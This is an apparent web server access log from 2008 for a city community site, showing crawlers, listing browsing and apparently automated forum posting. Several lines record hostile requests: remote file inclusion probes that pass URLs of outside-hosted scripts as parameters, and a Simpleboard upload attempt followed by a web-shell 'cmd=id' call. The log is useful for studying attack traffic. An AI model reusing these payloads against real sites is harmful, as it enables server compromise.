200.63.42.95 - - [30/Oct/2008:06:31:00 -0700] "POST /jodera2/login.php HTTP/1.0" 302 0 "http://www.sancarloscity.org/jodera2/login.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ru) Opera 8.01" "www.sancarloscity.org"
200.63.42.95 - - [30/Oct/2008:06:31:00 -0700] "GET /jodera2/index.php?sid=195e1b2c9dd9270645dac8235e4281ce HTTP/1.0" 200 55071 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ru) Opera 8.01" "www.sancarloscity.org"
200.63.42.95 - - [30/Oct/2008:06:31:08 -0700] "GET /jodera2/posting.php?mode=newtopic&f=1 HTTP/1.0" 200 41364 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ru) Opera 8.01" "www.sancarloscity.org"
200.63.42.95 - - [30/Oct/2008:06:31:33 -0700] "POST /jodera2/posting.php HTTP/1.0" 200 11442 "http://www.sancarloscity.org/jodera2/posting.php?mode=newtopic&f=1" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ru) Opera 8.01" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:31:33 -0700] "GET /listings/listing/results.php?letter=d&category_id=750 HTTP/1.1" 200 25109 "http://www.sancarloscity.org/listings/listing/results.php?letter=s&category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:31:37 -0700] "GET /listings/listing/results.php?letter=a&category_id=750 HTTP/1.1" 200 25109 "http://www.sancarloscity.org/listings/listing/results.php?letter=s&category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
216.245.209.178 - - [30/Oct/2008:06:32:11 -0700] "GET /forum2/index.php HTTP/1.0" 200 7706 "http://www.sancarloscity.org/forum2/index.php" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.sancarloscity.org"
216.245.209.178 - - [30/Oct/2008:06:32:12 -0700] "GET /forum2/index.php?act=rssout&id=4 HTTP/1.0" 200 3276 "http://www.sancarloscity.org/forum2/index.php?act=rssout&id=4" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.sancarloscity.org"
216.245.209.178 - - [30/Oct/2008:06:32:12 -0700] "GET /forum2/index.php HTTP/1.0" 200 7674 "http://www.sancarloscity.org/index.php" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.sancarloscity.org"
89.149.227.208 - - [30/Oct/2008:06:32:16 -0700] "GET /jodera2/posting.php?mode=newtopic&f=1 HTTP/1.0" 302 0 "http://www.sancarloscity.org/jodera2/posting.php?mode=newtopic&f=1" "Mozilla/2.0 compatible; Check&Get 1.14 (Windows NT)" "www.sancarloscity.org"
89.149.227.208 - - [30/Oct/2008:06:32:16 -0700] "GET /jodera2/login.php?redirect=posting.php&mode=newtopic&f=1&sid=9b4ea381f90641809ba49e066479a0a4 HTTP/1.0" 200 12362 "http://www.sancarloscity.org/jodera2/login.php?redirect=posting.php&mode=newtopic&f=1&sid=9b4ea381f90641809ba49e066479a0a4" "Mozilla/2.0 compatible; Check&Get 1.14 (Windows NT)" "www.sancarloscity.org"
89.149.227.208 - - [30/Oct/2008:06:32:17 -0700] "POST /jodera2/login.php HTTP/1.0" 302 0 "http://www.sancarloscity.org/jodera2/login.php?redirect=posting.php&mode=newtopic&f=1&sid=9b4ea381f90641809ba49e066479a0a4" "Mozilla/2.0 compatible; Check&Get 1.14 (Windows NT)" "www.sancarloscity.org"
89.149.227.208 - - [30/Oct/2008:06:32:18 -0700] "GET /jodera2/posting.php?mode=newtopic&f=1&sid=9b4ea381f90641809ba49e066479a0a4 HTTP/1.0" 200 40970 "http://www.sancarloscity.org/jodera2/posting.php?mode=newtopic&f=1&sid=9b4ea381f90641809ba49e066479a0a4" "Mozilla/2.0 compatible; Check&Get 1.14 (Windows NT)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:32:19 -0700] "GET /listings/listing/results.php?letter=h&category_id=750 HTTP/1.1" 200 25109 "http://www.sancarloscity.org/listings/listing/results.php?letter=s&category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
89.149.227.208 - - [30/Oct/2008:06:32:25 -0700] "POST /jodera2/posting.php HTTP/1.0" 200 11444 "http://www.sancarloscity.org/jodera2/posting.php?mode=newtopic&f=1&sid=9b4ea381f90641809ba49e066479a0a4" "Mozilla/2.0 compatible; Check&Get 1.14 (Windows NT)" "www.sancarloscity.org"
89.149.227.208 - - [30/Oct/2008:06:32:26 -0700] "GET /jodera2/viewtopic.php?p=29922#29922 HTTP/1.0" 200 31331 "http://www.sancarloscity.org/viewtopic.php?p=29922#29922" "Mozilla/2.0 compatible; Check&Get 1.14 (Windows NT)" "www.sancarloscity.org"
82.99.30.65 - - [30/Oct/2008:06:32:39 -0700] "GET /jodera2/faq.php?sid=c246e30e2f10bdb242f4750d75f35054 HTTP/1.0" 200 68232 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.sancarloscity.org"
84.16.231.171 - - [30/Oct/2008:06:32:41 -0700] "GET /jodera2/posting.php?mode=newtopic&f=1 HTTP/1.0" 302 0 "http://www.sancarloscity.org/jodera2/posting.php?mode=newtopic&f=1" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko/20050302 Firefox/0.9.6" "www.sancarloscity.org"
84.16.231.171 - - [30/Oct/2008:06:32:42 -0700] "GET /jodera2/login.php?redirect=posting.php&mode=newtopic&f=1&sid=12804fb050b8cbbc69ca95ca6a91a87d HTTP/1.0" 200 12362 "http://www.sancarloscity.org/jodera2/login.php?redirect=posting.php&mode=newtopic&f=1&sid=12804fb050b8cbbc69ca95ca6a91a87d" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko/20050302 Firefox/0.9.6" "www.sancarloscity.org"
84.16.231.171 - - [30/Oct/2008:06:32:44 -0700] "POST /jodera2/login.php HTTP/1.0" 302 0 "http://www.sancarloscity.org/jodera2/login.php?redirect=posting.php&mode=newtopic&f=1&sid=12804fb050b8cbbc69ca95ca6a91a87d" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko/20050302 Firefox/0.9.6" "www.sancarloscity.org"
84.16.231.171 - - [30/Oct/2008:06:32:44 -0700] "GET /jodera2/posting.php?mode=newtopic&f=1&sid=12804fb050b8cbbc69ca95ca6a91a87d HTTP/1.0" 200 40970 "http://www.sancarloscity.org/jodera2/posting.php?mode=newtopic&f=1&sid=12804fb050b8cbbc69ca95ca6a91a87d" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko/20050302 Firefox/0.9.6" "www.sancarloscity.org"
75.126.148.210 - - [30/Oct/2008:06:32:52 -0700] "GET / HTTP/1.0" 200 44270 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "www.sancarloscity.org"
84.16.231.171 - - [30/Oct/2008:06:32:56 -0700] "POST /jodera2/posting.php HTTP/1.0" 200 11444 "http://www.sancarloscity.org/jodera2/posting.php?mode=newtopic&f=1&sid=12804fb050b8cbbc69ca95ca6a91a87d" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko/20050302 Firefox/0.9.6" "www.sancarloscity.org"
84.16.231.171 - - [30/Oct/2008:06:32:58 -0700] "GET /jodera2/viewtopic.php?p=29923 HTTP/1.0" 200 31286 "http://www.sancarloscity.org/viewtopic.php?p=29923#29923" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko/20050302 Firefox/0.9.6" "www.sancarloscity.org"
87.94.1.95 - - [30/Oct/2008:06:33:00 -0700] "GET /logs/access_070921.log/index.php?cat=http://www.gosgo.com/bbs/idbr.txt??? HTTP/1.1" 404 768 "-" "libwww-perl/5.812" "www.sancarloscity.org"
87.94.1.95 - - [30/Oct/2008:06:33:05 -0700] "GET /logs/access_070921.log/index.php?cat=http://www.gosgo.com/bbs/idbr.txt??? HTTP/1.1" 404 768 "-" "libwww-perl/5.812" "www.sancarloscity.org"
89.149.202.60 - - [30/Oct/2008:06:33:19 -0700] "GET /jodera2/posting.php?mode=newtopic&f=1 HTTP/1.0" 302 0 "http://www.sancarloscity.org/jodera2/posting.php?mode=newtopic&f=1" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.5) Gecko/20050207 Firefox/1.0.1" "www.sancarloscity.org"
89.149.202.60 - - [30/Oct/2008:06:33:21 -0700] "GET /jodera2/login.php?redirect=posting.php&mode=newtopic&f=1&sid=5a379939062db31bd62f7ccb02403667 HTTP/1.0" 200 12362 "http://www.sancarloscity.org/jodera2/login.php?redirect=posting.php&mode=newtopic&f=1&sid=5a379939062db31bd62f7ccb02403667" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.5) Gecko/20050207 Firefox/1.0.1" "www.sancarloscity.org"
89.149.202.60 - - [30/Oct/2008:06:33:24 -0700] "POST /jodera2/login.php HTTP/1.0" 302 0 "http://www.sancarloscity.org/jodera2/login.php?redirect=posting.php&mode=newtopic&f=1&sid=5a379939062db31bd62f7ccb02403667" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.5) Gecko/20050207 Firefox/1.0.1" "www.sancarloscity.org"
89.149.202.60 - - [30/Oct/2008:06:33:24 -0700] "GET /jodera2/posting.php?mode=newtopic&f=1&sid=5a379939062db31bd62f7ccb02403667 HTTP/1.0" 200 40970 "http://www.sancarloscity.org/jodera2/posting.php?mode=newtopic&f=1&sid=5a379939062db31bd62f7ccb02403667" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.5) Gecko/20050207 Firefox/1.0.1" "www.sancarloscity.org"
89.149.202.60 - - [30/Oct/2008:06:33:32 -0700] "POST /jodera2/posting.php HTTP/1.0" 200 11444 "http://www.sancarloscity.org/jodera2/posting.php?mode=newtopic&f=1&sid=5a379939062db31bd62f7ccb02403667" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.5) Gecko/20050207 Firefox/1.0.1" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:33:32 -0700] "GET /listings/listing/results.php?letter=l&category_id=750 HTTP/1.1" 200 25109 "http://www.sancarloscity.org/listings/listing/results.php?letter=s&category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
89.149.202.60 - - [30/Oct/2008:06:33:33 -0700] "GET /jodera2/viewtopic.php?p=29924 HTTP/1.0" 200 31349 "http://www.sancarloscity.org/viewtopic.php?p=29924#29924" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.5) Gecko/20050207 Firefox/1.0.1" "www.sancarloscity.org"
83.220.144.232 - - [30/Oct/2008:06:33:43 -0700] "GET /logs/access_080927.log%20/errors.php?error=https://www.ba-sat.com/sunshop/images/products/idkm.txt??? HTTP/1.1" 404 770 "-" "libwww-perl/5.805" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:33:45 -0700] "GET /listings/claim.php?claimlistingid=14828 HTTP/1.1" 200 14178 "http://www.sancarloscity.org/listings/listing/results.php?category_id=759" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:33:48 -0700] "GET /listings/listing/results.php?category_id=718 HTTP/1.1" 200 28945 "http://www.sancarloscity.org/listings/listing/results.php?category_id=759" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:33:50 -0700] "GET /listings/listing/detail.php?id=14828 HTTP/1.1" 200 35945 "http://www.sancarloscity.org/listings/listing/results.php?category_id=759" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:33:52 -0700] "GET /listings/listing/detail.php?id=14828 HTTP/1.1" 200 35945 "http://www.sancarloscity.org/listings/listing/results.php?category_id=759" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
218.38.34.152 - - [30/Oct/2008:06:33:55 -0700] "GET /logs/access_081006.log/phphtml.php?htmlclass_path=? HTTP/1.1" 404 770 "-" "libwww-perl/5.79" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:33:55 -0700] "GET /listings/listing/results.php?category_id=705 HTTP/1.1" 200 24477 "http://www.sancarloscity.org/listings/listing/results.php?category_id=759" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
218.38.34.152 - - [30/Oct/2008:06:33:55 -0700] "GET /phphtml.php?htmlclass_path=? HTTP/1.1" 404 760 "-" "libwww-perl/5.79" "www.sancarloscity.org"
218.38.34.152 - - [30/Oct/2008:06:33:56 -0700] "GET /logs/phphtml.php?htmlclass_path=? HTTP/1.1" 404 765 "-" "libwww-perl/5.79" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:33:57 -0700] "GET /listings/listing/results.php?category_id=711 HTTP/1.1" 200 31209 "http://www.sancarloscity.org/listings/listing/results.php?category_id=759" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
195.184.218.234 - - [30/Oct/2008:06:33:59 -0700] "GET /jodera2/viewtopic.php?p=25260 HTTP/1.0" 200 82684 "http://www.google.com.ua/search?hl=ru&q=%D1%81%D1%82%D1%8B%D1%80%D1%8B%D0%B5+%D0%B1%D0%B0%D0%B1%D1%8B&meta=" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 4.6 (build 01425); InfoPath.1)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:33:59 -0700] "GET /listings/listing/results.php?category_id=698 HTTP/1.1" 200 33523 "http://www.sancarloscity.org/listings/listing/results.php?category_id=759" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
195.184.218.234 - - [30/Oct/2008:06:34:00 -0700] "GET /jodera2/templates/Cobalt/Cobalt.css HTTP/1.0" 200 15663 "http://www.sancarloscity.org/jodera2/viewtopic.php?p=25260" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 4.6 (build 01425); InfoPath.1)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:34:01 -0700] "GET /listings/listing/results.php?category_id=708 HTTP/1.1" 200 24431 "http://www.sancarloscity.org/listings/listing/results.php?category_id=759" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:34:03 -0700] "GET /listings/listing/results.php?category_id=736 HTTP/1.1" 200 24382 "http://www.sancarloscity.org/listings/listing/results.php?category_id=759" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
195.184.218.234 - - [30/Oct/2008:06:34:06 -0700] "GET /jodera2/templates/Cobalt/images/lang_english/icon_msnm.gif HTTP/1.0" 200 834 "http://www.sancarloscity.org/jodera2/viewtopic.php?p=25260" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 4.6 (build 01425); InfoPath.1)" "sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:34:06 -0700] "GET /listings/listing/results.php?category_id=721 HTTP/1.1" 200 24446 "http://www.sancarloscity.org/listings/listing/results.php?category_id=759" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
195.184.218.234 - - [30/Oct/2008:06:34:06 -0700] "GET /jodera2/templates/Cobalt/formIE.css HTTP/1.0" 200 371 "http://www.sancarloscity.org/jodera2/viewtopic.php?p=25260" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 4.6 (build 01425); InfoPath.1)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:34:08 -0700] "GET /listings/listing/detail.php?id=14828 HTTP/1.1" 200 35945 "http://www.sancarloscity.org/listings/listing/results.php?category_id=759" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
89.149.241.165 - - [30/Oct/2008:06:34:11 -0700] "GET /jodera2/posting.php?mode=reply&t=24093 HTTP/1.0" 302 0 "http://www.sancarloscity.org/jodera2/posting.php?mode=reply&t=24093" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.sancarloscity.org"
89.149.241.165 - - [30/Oct/2008:06:34:11 -0700] "GET /jodera2/login.php?redirect=posting.php&mode=reply&t=24093&sid=6efe4c96587cda987cae09effd2950f3 HTTP/1.0" 200 12363 "http://www.sancarloscity.org/jodera2/login.php?redirect=posting.php&mode=reply&t=24093&sid=6efe4c96587cda987cae09effd2950f3" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.sancarloscity.org"
89.149.241.165 - - [30/Oct/2008:06:34:12 -0700] "POST /jodera2/login.php HTTP/1.0" 302 0 "http://www.sancarloscity.org/jodera2/login.php?redirect=posting.php&mode=reply&t=24093&sid=6efe4c96587cda987cae09effd2950f3" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.sancarloscity.org"
89.149.241.165 - - [30/Oct/2008:06:34:13 -0700] "GET /jodera2/posting.php?mode=reply&t=24093&sid=6efe4c96587cda987cae09effd2950f3 HTTP/1.0" 200 50628 "http://www.sancarloscity.org/jodera2/posting.php?mode=reply&t=24093&sid=6efe4c96587cda987cae09effd2950f3" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:34:13 -0700] "GET /listings/listing/results.php?category_id=722 HTTP/1.1" 200 47383 "http://www.sancarloscity.org/listings/listing/results.php?category_id=759" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:34:19 -0700] "GET /listings/listing/results.php?category_id=709 HTTP/1.1" 200 26705 "http://www.sancarloscity.org/listings/listing/results.php?category_id=759" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
220.181.32.13 - - [30/Oct/2008:06:34:23 -0700] "GET / HTTP/1.1" 200 44270 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" "www.sancarloscity.org"
89.149.241.165 - - [30/Oct/2008:06:34:23 -0700] "POST /jodera2/posting.php HTTP/1.0" 200 11444 "http://www.sancarloscity.org/jodera2/posting.php?mode=reply&t=24093&sid=6efe4c96587cda987cae09effd2950f3" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:34:23 -0700] "GET /listings/listing/results.php?category_id=716 HTTP/1.1" 200 24409 "http://www.sancarloscity.org/listings/listing/results.php?category_id=759" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
89.149.241.165 - - [30/Oct/2008:06:34:24 -0700] "GET /jodera2/viewtopic.php?p=29925 HTTP/1.0" 200 82544 "http://www.sancarloscity.org/viewtopic.php?p=29925#29925" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:34:26 -0700] "GET /listings/listing/results.php?category_id=691 HTTP/1.1" 200 53084 "http://www.sancarloscity.org/listings/listing/results.php?category_id=759" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:34:33 -0700] "GET /listings/listing/results.php?category_id=732 HTTP/1.1" 200 31141 "http://www.sancarloscity.org/listings/listing/results.php?category_id=759" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:34:36 -0700] "GET /listings/listing/review.php?listing_id=14896 HTTP/1.1" 200 21497 "http://www.sancarloscity.org/listings/listing/results.php?category_id=759" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
72.30.142.88 - - [30/Oct/2008:06:34:37 -0700] "GET /picgallery/displayimage.php?album=18&pos=9 HTTP/1.0" 200 10043 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:34:39 -0700] "GET /listings/listing/results.php?category_id=696 HTTP/1.1" 200 28997 "http://www.sancarloscity.org/listings/listing/results.php?category_id=759" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:34:48 -0700] "GET /listings/listing/results.php?letter=d&category_id=759 HTTP/1.1" 200 25121 "http://www.sancarloscity.org/listings/listing/results.php?category_id=759" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:34:52 -0700] "GET /listings/listing/results.php?letter=t&category_id=759 HTTP/1.1" 200 25121 "http://www.sancarloscity.org/listings/listing/results.php?category_id=759" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
200.63.42.79 - - [30/Oct/2008:06:35:31 -0700] "GET /jodera2/index.php HTTP/1.0" 200 61808 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MRA 4.6 (build 01425))" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:35:35 -0700] "GET /listings/listing/results.php?letter=y&category_id=759 HTTP/1.1" 200 25121 "http://www.sancarloscity.org/listings/listing/results.php?category_id=759" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
74.6.8.93 - - [30/Oct/2008:06:35:36 -0700] "GET /picgallery/thumbnails.php?album=3 HTTP/1.0" 200 16706 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:35:40 -0700] "GET /listings/listing/results.php?letter=z&category_id=759 HTTP/1.1" 200 25121 "http://www.sancarloscity.org/listings/listing/results.php?category_id=759" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
92.250.50.2 - - [30/Oct/2008:06:35:41 -0700] "POST /components/com_simpleboard/image_upload.php HTTP/1.1" 404 779 "-" "libwww-perl/5.813" "www.sancarloscity.org"
92.250.50.2 - - [30/Oct/2008:06:35:42 -0700] "GET /components/com_simpleboard/utyx.php?cmd=id HTTP/1.1" 404 771 "-" "-" "www.sancarloscity.org"
200.63.42.79 - - [30/Oct/2008:06:35:55 -0700] "GET /jodera2/viewforum.php?f=1&sid=51e2d88bf904979fdf5178687657a055 HTTP/1.0" 200 84769 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MRA 4.6 (build 01425))" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:36:00 -0700] "GET /listings/listing/results.php?letter=r&category_id=759 HTTP/1.1" 200 25121 "http://www.sancarloscity.org/listings/listing/results.php?category_id=759" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
84.16.230.111 - - [30/Oct/2008:06:36:12 -0700] "GET /jodera2/posting.php?mode=reply&t=24095 HTTP/1.0" 302 0 "http://www.sancarloscity.org/jodera2/posting.php?mode=reply&t=24095" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.0.3705)" "www.sancarloscity.org"
84.16.230.111 - - [30/Oct/2008:06:36:12 -0700] "GET /jodera2/login.php?redirect=posting.php&mode=reply&t=24095&sid=4461541f3c06e33a99e15ef12465d8f1 HTTP/1.0" 200 12363 "http://www.sancarloscity.org/jodera2/login.php?redirect=posting.php&mode=reply&t=24095&sid=4461541f3c06e33a99e15ef12465d8f1" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.0.3705)" "www.sancarloscity.org"
84.16.230.111 - - [30/Oct/2008:06:36:14 -0700] "POST /jodera2/login.php HTTP/1.0" 302 0 "http://www.sancarloscity.org/jodera2/login.php?redirect=posting.php&mode=reply&t=24095&sid=4461541f3c06e33a99e15ef12465d8f1" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.0.3705)" "www.sancarloscity.org"
84.16.230.111 - - [30/Oct/2008:06:36:14 -0700] "GET /jodera2/posting.php?mode=reply&t=24095&sid=4461541f3c06e33a99e15ef12465d8f1 HTTP/1.0" 200 50423 "http://www.sancarloscity.org/jodera2/posting.php?mode=reply&t=24095&sid=4461541f3c06e33a99e15ef12465d8f1" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:36:16 -0700] "GET /listings/listing/results.php?letter=x&category_id=759 HTTP/1.1" 200 25121 "http://www.sancarloscity.org/listings/listing/results.php?category_id=759" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:36:18 -0700] "GET /listings/listing/results.php?letter=a&category_id=759 HTTP/1.1" 200 25121 "http://www.sancarloscity.org/listings/listing/results.php?category_id=759" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
66.249.73.51 - - [30/Oct/2008:06:36:18 -0700] "GET /forum2/index.php?showtopic=106&mode=threaded&pid=884 HTTP/1.1" 200 7410 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:36:20 -0700] "GET /listings/listing/results.php?letter=w&category_id=759 HTTP/1.1" 200 25121 "http://www.sancarloscity.org/listings/listing/results.php?category_id=759" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
